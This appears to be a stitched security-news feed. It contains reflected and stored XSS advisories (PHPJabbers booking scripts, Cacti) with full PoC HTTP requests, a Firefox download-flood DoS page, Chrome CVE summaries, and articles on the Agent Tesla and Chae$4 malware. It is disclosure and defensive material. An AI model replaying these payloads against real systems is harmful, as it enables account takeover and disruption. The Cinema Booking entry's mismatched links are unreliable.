Event Booking Calendar version 4.0 suffers from a cross site scripting vulnerability.

    ## Title: Event Booking Calendar-4.0 XSS-Reflected## Author: nu11secur1ty## Date: 09/06/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/event-booking-calendar/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the index request parameter is copied into the value ofan HTML tag attribute which is encapsulated in double quotation marks.The payload ap5yf"><script>alert(1)</script>n9d5d was submitted in theindex parameter. This input was echoed unmodified in the application'sresponse.The attacker can make a specially crafted malicious URL and spread itinto the network, to infect every user of this system who clicks on itand visit it.STATUS: HIGH Vulnerability[+]Testing Payload:```GETGET /1693985138_790/index.php?controller=pjFrontPublic&action=pjActionLoadEvents&session_id=&theme=theme7&locale=1&hide=0&index=4786ap5yf%22%3e%3cscript%3ealert(1)%3c%2fscript%3en9d5d&show_header=1&show_icons=1&show_categories=1&category_id=0&month=09&year=2023&view=calendar&period=&page=1HTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.1968270768.1693986414;_gid=GA1.2.227754763.1693986414; _gat=1;_fbp=fb.1.1693986413650.1548084853;_ga_NME5VTTGTT=GS1.2.1693986413.1.0.1693986413.60.0.0X-Requested-With: XMLHttpRequestReferer: https://demo.phpjabbers.com/1693985138_790/preview.php?lid=1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Event-Booking-Calendar-4.0%20)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/event-booking-calendar-40-xss-reflected.html)## Time spent:01:25:00

Event Booking Calendar 4.0 Cross Site Scripting

Firefox version 117 suffers from a file creation denial of service vulnerability.

    This is barely a DoS, but since Chrome has explicit protectionagainst it, we decided to disclose it.If firefox user visits a specially crafted page, then firefoxmay create many files in `~/Downloads`,The user is notified about this in a small dialog, but there isno option to stop the downloads.The potential denial of service is that the user must manuallydelete the created files and this might be PITA.Technically about the PoC:  create non-empty file `xml.doc`.To force download, add to the page `iframe src="xml.doc"`.To force creation of new files, add `body onload="location.reload()"`(there are several other options about this).[Proof of concept][1]To out surprise, Chrome is safe from this and it distinguishesmanual download from automated download and this might be becauseit is aware about this DoS.Affected:  firefox 117 on GNU/Linux and reportedly on Windows.Not Affected:  firefox on android, Chrome, lynx.[1]: https://j.ludost.net/y3.html--- poc y3.html ---<html><body>Wait about 20 seconds andcheck for new files in ~/Downloads and also for message from firefox. Written by Georgi Guninski.<iframe src="xml.doc" width=10 height=10></iframe><script>setInterval(function () {location.reload()},1000);</script></body></html>--- poc y3.html ---

Firefox 117 Denial Of Service

Cinema Booking System version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Cinema Booking System-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 09/05/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/car-rental-script/## Reference: https://portswigger.net/web-security/sql-injection## Description:The name of an arbitrarily supplied URL parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks. The payload kfimq"><script>alert(1)</script>k0a57 wassubmitted in the name of an arbitrarily supplied URL parameter. Thisinput was echoed unmodified in the application's response. Theattacker can trick all users of this system into visiting a veryDANGEROUS URL address, and the worst thing is when they try to log into this system, by using his malicious link!STATUS: HIGH-CRITICAL Vulnerability[+]Testing Payload:```GET /1693939439_790/index.php/kfimq"><script>alert(1)</script>k0a57?controller=pjAdmin&action=pjActionLoginHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Cinema-Booking-System-1.0%20)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/cinema-booking-system-10-xss-reflected.html)## Time spent:00:17:00

Cinema Booking System 1.0 Cross Site Scripting

By Deeba Ahmed
FortiGuard Discovers Phishing Campaign Distributing New Agent Tesla Variant to Windows Devices.
This is a post from HackRead.com Read the original post: New Agent Tesla Variant Uses Excel Exploit to Infect Windows PCs

The new Agent Tesla variant exploits CVE-2017-11882/CVE-2018-0802 vulnerability to execute the malware. 

**Key Findings**

*   **A new variant of the Agent Tesla malware family is being used in a phishing campaign.**

*   **The malware can steal credentials, keylogging data, and active screenshots from the victim’s device.**

*   **The malware is spread through a malicious MS Excel attachment in phishing emails.**

*   **The malware exploits an old security vulnerability (CVE-2017-11882/CVE-2018-0802) to infect Windows devices.**

*   **The malware ensures persistence even when the device is restarted or the malware process is killed.**

**New Agent Tesla Variant Detected in Malicious Phishing Campaign**

FortiGuard Labs threat researchers have detected a new variant of the notorious Agent Tesla malware family used in a phishing campaign. Report author Xiaopeng Zhang revealed that the malware can steal “credentials, keylogging data, and active screenshots” from the victim’s device. Stolen data is transferred to the malware operator through email or SMTP protocol. The malware mainly infects Windows devices.

For your information, Agent Tesla malware is also offered as a Malware-as-a-Service tool. The malware variants use a data stealer and .NET-based RAT (remote access trojan) for initial access.

**How Phishers Trap Users?**

This is a phishing campaign, so initial access is gained through a phishing email designed to trick users into downloading the malware. The email is a Purchase Order notification that asks the recipient to confirm their order from an industrial equipment supplier.

The email contains a malicious MS Excel attachment titled Order 45232429.xls. This document is in OLE format and contains crafted equation data that exploits an old security RCE vulnerability tracked as CVE-2017-11882/CVE-2018-0802 instead of using a VBS macro.

This vulnerability causes memory corruption in the EQNEDT32.EXE process and allows arbitrary code execution through ProcessHollowing method, in which a hacker replaces the executable file’s code with malicious code.

A shellcode download/execute the Agent Tesla file (dasHost.exe) from this link “hxxp://2395.128.195/3355/chromium.exe” onto the targeted device. It is a .NET program protected by IntelliLock and .NET Reactor. Relevant modules are encrypted/encoded in the Resource section to prevent its core module from detection and analysis.

It is worth noting that Microsoft released fixes for this vulnerability in November 2017 and January 2018. However, it is still being exploited by threat actors indicating the presence of unpatched devices. Per FortiGuard research, they observe around 1300 vulnerable devices daily and mitigate 3,000 attacks at the IPS level per day.

The phishing email and the ShellCode identified by the researchers (Screenshots: FortiGuard Labs)

**Analysis of Agent Tesla Activities**

According to FortiGuard Labs’ report, published on 5 Sep 2023, Agent Tesla variant steals stored credentials from web browsers, email clients, FTP clients, etc. There is a long list of targeted software and email clients available here.

The malware sets a keyboard hook through the API SetWindowsHookEx() to monitor low-level keyboard inputs and calls the callback hook procedure “this.EiqpViCm9()” whenever the victim types something on the device. The malware steals the program title, time, and input contents at regular intervals. A Timer calls a method to check the log.tmp file every 20 seconds and sends the info to the attacker via STMP. Moreover, the malware uses another Timer with a 20-minute interval to check for device activities and determine when to capture screenshots.

**How does Agent Tesla maintain persistence?**

Agent Tesla malware ensures persistence even when the device is restarted, or the malware process is killed, using two methods. It either executes a command for creating a task in the TaskScheuler system in the payload module or adds an auto-run item in the system registry. These methods allow duplication of dasHost.exe to launch automatically when the system restarts.

**Protection against such campaigns**

**Be suspicious of any email that asks for your personal or financial information:** Phishing emails often try to trick you into giving up your passwords, credit card numbers, or other sensitive information. Never click on links or open attachments in emails from senders you don’t know or trust.

**Keep your software up to date**: Software updates often include security patches that can help protect you from malware. Make sure to install security updates as soon as they are available.

**Use a strong antivirus and anti-malware program**: Antivirus and anti-malware programs can help detect and remove malware from your computer. Keep your antivirus and anti-malware programs up to date and scan your computer regularly.

**Be careful what you click on**: Phishing emails often contain links that lead to malicious websites. If you click on a link in an email, make sure to check the URL carefully before visiting the website.

**Use a spam filter**: A spam filter can help reduce the number of phishing emails that you receive.

**Educate yourself about phishing**: The more you know about phishing, the better you will be able to spot it. Read up on phishing scams and how to protect yourself.

1.  Hackers leak logins of vulnerable Fortinet SSL VPNs
2.  Hackers Using Stolen Ivacy VPN Certificate To Sign Malware
3.  Smoke Loader Drops Location Tracker Whiffy Recon Malware
4.  Luna Grabber Malware Hits Roblox Devs Using npm Packages
5.  Chae$4 Malware Steals Login, Financial Data from Businesses
6.  Adobe ColdFusion Vulnerabilities Exploited to Deploy Malware

New Agent Tesla Variant Uses Excel Exploit to Infect Windows PCs

By Habiba Rashid
Meet Chae$4 malware: the new and even harder-to-detect variant of the infamous Chaes malware.
This is a post from HackRead.com Read the original post: New Chae$4 Malware Steals Login, Financial Data from Businesses

**KEY FINDINGS**

*   **Chae$4 is a new and advanced malware variant that targets customers of financial and logistics companies in Latin America.**

*   **The malware is difficult to detect because it uses sophisticated encryption techniques and stealth mechanisms.**

*   **Chae$4 can steal login credentials, financial data, and other sensitive information.**

*   **The malware is spread through malicious MSI installers, often disguised as legitimate application installers.**

Morphisec, a leading cybersecurity firm, has discovered a new and advanced variant of the Chaes malware targeting customers of financial and logistics companies in Latin America. This article delves into the mechanics of this evolved malware, dubbed Chae$4 as well as its implications, and strategies for businesses to safeguard against it.

The Chaes malware first emerged in November 2020 primarily targeting e-commerce customers in Latin America, particularly Brazil. The malware had been active since at least mid-2020, making its presence known by targeting unsuspecting victims.

The latest variant, Chae$4, marks a significant evolution in its capabilities. Chae$4 malware features a more sophisticated code structure advanced encryption techniques and stealth mechanisms, making it even harder to detect.

According to a report shared by Morphisec to Hackread.com, Chae$4 malware predominantly uses Python, employing decryption and dynamic in-memory execution, therefore evading traditional defence systems. The malware has abandoned Puppeteer in favour of a bespoke approach to monitor and intercept Chromium browsers’ activities.

Chae$4 targets a broader range of services, including prominent platforms and banks such as Mercado Libre, Mercado Pago, WhatsApp Web, Itau Bank, Caixa Bank, and even MetaMask.

The new variant employs WebSockets for primary communication between its modules and the Command and Control (C2) server. In addition to this, Chae$4 uses a Domain Generation Algorithm (DGA) for the dynamic resolution of the C2 server’s address.

The Chae$4 malware comprises several modules, each serving a specific purpose. These modules include:

*   _**Init Module**_: This module initiates communication with the attacker, gathering extensive data about the infected system.

*   _**Online Module**_: It functions as a beacon, informing the attacker of the infected system’s activity status.

*   _**Chronod Module**_: Responsible for stealing credentials, this module targets browser activities, including login data and financial information including BTC, ETH and PIX transfers.

*   _**Appita Module**_: Similar to the Chronod module, this one specifically focuses on targeting Itau Bank’s application.

*   _**Chrautos Module**_: An advanced version of Chronod and Appita modules, it offers better code architecture and enhanced capabilities.

*   _**Stealer Module**_: This module specializes in stealing data from Chromium-based browsers, including login data, credit card details, cookies, and autofill information.

*   _**File Upload Module**_: This recent addition allows the malware to search for and upload specific files, such as those related to the MetaMask’s Chrome extension.

The infection typically starts with the execution of a malicious MSI installer, often disguised as a legitimate application installer. The malware then deploys and downloads necessary files to establish persistence on the infected system.

The core component, ChaesCore, is responsible for setting up persistence and migrating into legitimate processes. Once initialized, ChaesCore communicates with the C2 server and downloads additional modules as required. Communication is encrypted to hide its activities.

Components of Chae$4 malware

The MSI installer contains obfuscated JavaScript and PowerShell scripts that establish the malware’s working directory and downloads essential files. The Module Wrapper decrypts and dynamically loads modules, executing their malicious code.

Different modules focus on stealing various types of data, such as login credentials, personal information, and financial data. 

Chae$4 malware is a serious threat, but by taking steps to protect yourself, you can help to keep your data safe. In addition to the information above, here are some other things to keep in mind about Chae$4:

*   The malware is still under development, so new features or capabilities may be added in the future.

*   The malware is targeted at a specific region, but it is possible that it could be used to target other regions in the future.

*   The malware is constantly evolving, so it is important to stay up-to-date on the latest information about it.

New Chae$4 Malware Steals Login, Financial Data from Businesses

Use after free in Networks in Google Chrome prior to 116.0.5845.179 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4763: Stable Channel Update for Desktop

Out of bounds memory access in FedCM in Google Chrome prior to 116.0.5845.179 allowed a remote attacker who had compromised the renderer process to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4761

Incorrect security UI in BFCache in Google Chrome prior to 116.0.5845.179 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4764

Type Confusion in V8 in Google Chrome prior to 116.0.5845.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4762

Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a Stored Cross-Site-Scripting (XSS) Vulnerability which allows an authenticated user to poison data stored in the _cacti_'s database. These data will be viewed by administrative _cacti_ accounts and execute JavaScript code in the victim's browser at view-time. The script under `data_sources.php` displays the data source management information (e.g. data source path, polling configuration etc.) for different data visualizations of the _cacti_ app. CENSUS found that an adversary that is able to configure a malicious data-source path, can deploy a stored XSS attack against any user of the same (or broader) privileges. A user that possesses the 'General Administration>Sites/Devices/Data' permissions can configure the data source path in Cacti. This configuration occurs through `http://<HOST>/cacti/data_sources.php`. The same page can be used for previewing the data source path. This issue has been addressed in version 1.2.25. Users are advised to upgrade. Users unable to upgrade should manually escape HTML output.


**Summary**

A Stored Cross-Site-Scripting Vulnerability allows an authenticated user to poison data stored in the _cacti_'s database. These data will be viewed by administrative _cacti_ accounts and execute JavaScript code in the victim's browser at view-time.

**Details**

The script under data_sources.php displays the data source management information (e.g. data source path, polling configuration etc.) for different data visualizations of the _cacti_ app. CENSUS found that an adversary that is able to configure a malicious data-source path, can deploy a stored XSS attack against any user of the same (or broader) privileges.

A user that possesses the 'General Administration>Sites/Devices/Data' permissions can configure the data source path in Cacti. This configuration occurs through http://<HOST>/cacti/data_sources.php. The same page can be used for previewing the data source path.

The relevant vulnerable code can be found in data_sources.php:1166

/\* display the debug mode box if the user wants it \*/
if ((isset($\_SESSION\['ds\_debug\_mode'\])) && (isset\_request\_var('id'))) {
	?>
	<table style\='width:100%'\>
		<tr\>
			<td\>
				<span class\='textInfo'\><?php print \_\_('Data Source Debug');?></span\><br\>
				<pre\><?php print @rrdtool\_function\_create(get\_request\_var('id'), true);?></pre\>
			</td\>
		</tr\>
	</table\>
	<?php
}

The XSS vulnerability is due to the @rrdtool_function_create(get_request_var('id'), true); statement which inserts the debug information as raw text to the resulting HTML view. This malicious input will be rendered each time the server executes the above code block, leading to a stored-XSS attack.

A Stored XSS attack, aka Stored Cross Site Scripting attack, is manifested when an adversary poisons data that is stored in the backend with malicious JavaScript code. If a site is vulnerable to a stored XSS attack then when the poisoned data get rendered on the victim's browser, the malicious code block will become part of the browser's DOM and with thus be executed at view-time.

One must note that it is possible to force the debug condition by providing a link of the form:

    http://<HOST>/cacti/data_sources.php?action=ds_edit&id=8&debug=1
    

**PoC**

To verify the issue one can perform a call of the following form, in order to place a malicious payload in the cacti database:

    POST /cacti/data_sources.php?header=false HTTP/1.1
    Host: HOST
    Content-Length: 761
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://<HOST>
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: <COOKIE>
    Connection: close
    
    __csrf_magic=<CSRF TOKEN>&data_template_id=3&host_id=2&_data_template_id=3&_host_id=2&_data_input_id=15&data_template_data_id=198&local_data_template_data_id=3&local_data_id=8&name=%7Chost_description%7C+-+Apache+HTTP++-+CPU+Load&data_source_path=%3Cpath_rra%3E%2Fasdf_apache_cpuload_8.rrd%3Cimg+src%3Dx+onerror%3D%22alert('data+source+path')%22%3E&data_input_id=15&data_source_profile_id=1&rrd_step=300&active=on&data_source_name_277=apache_cpuload&rrd_minimum_277=0&rrd_maximum_277=100&data_source_type_id_277=1&rrd_heartbeat_277=600&data_input_field_id_277=52&value_51=asdf&save_component_data=1&save_component_data_source=1&action=save
    

For the attacker to place the malicious payload, the aforementioned 'General Administration>Sites/Devices/Data' privileges are required. For the victim to view the malicious information, the same or higher privileges are required.

An example request that renders the malicious data can be found below:

    GET /cacti/data_sources.php?action=ds_edit&id=8&debug=1 HTTP/1.1
    Host: <HOST>
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    X-Requested-With: XMLHttpRequest
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: <COOKIE>
    Connection: close
    

Following the html code in which our payload will be rendered:

<td\>
<span class\="textInfo"\>Data Source Debug</span\><br\>
pre\>/usr/bin/rrdtool create \\
/var/www/html/cacti/rra/scriptalertdevicescript\_apache\_cpuload\_39.rrd<script\>alert('data source path')</script\> \\
--start 0 --step 300  \\
DS:apache\_cpuload:GAUGE:600:0:100 \\
RRA:AVERAGE:0.5:1:600 \\
RRA:AVERAGE:0.5:6:700 \\
RRA:AVERAGE:0.5:24:775 \\
RRA:AVERAGE:0.5:288:797 \\
RRA:MIN:0.5:1:600 \\
RRA:MIN:0.5:6:700 \\
RRA:MIN:0.5:24:775 \\
RRA:MIN:0.5:288:797 \\
RRA:MAX:0.5:1:600 \\
RRA:MAX:0.5:6:700 \\
RRA:MAX:0.5:24:775 \\
RRA:MAX:0.5:288:797 \\
RRA:LAST:0.5:1:600 \\
RRA:LAST:0.5:6:700 \\
RRA:LAST:0.5:24:775 \\
RRA:LAST:0.5:288:797 \\
</pre\>
</td\>

and the alert(.) message after the page request  

**Impact**

To perform the Stored XSS attack the adversary needs to be an authorized cacti user with the following permissions:

*   'General Administration>Sites/Devices/Data'

The victim of the stored XSS attack could be any account with the same or broader privileges  
including administrative accounts.

Once the attacker has executed the malicious JavaScript within the victim's browser it is possible to

*   perform a victim-account takeover
*   perform arbitrary actions on the platform as the victim user
*   redirect the user to a malicious website
*   ask for sensitive information, under the cover of the cacti webpage
*   run browser related exploits and attacks
*   join a browser botnet and participate in a DDoS attack

**Remediation**

Before rendering this user supplied information either make this be a text element in the rendered HTML or escape (by using HTML entities) the content so that the malicious block will not be considered as code in the final HTML output.

> The issue was identified by _Vissarion Moutafis_ of _CENSUS_. _CENSUS_ will be releasing an advisory for this issue once a release that fixes the issue becomes available (or in 90 days, whichever comes first). Should you require assistance with the review of the patch we will be more than happy to help!

Tag

#chrome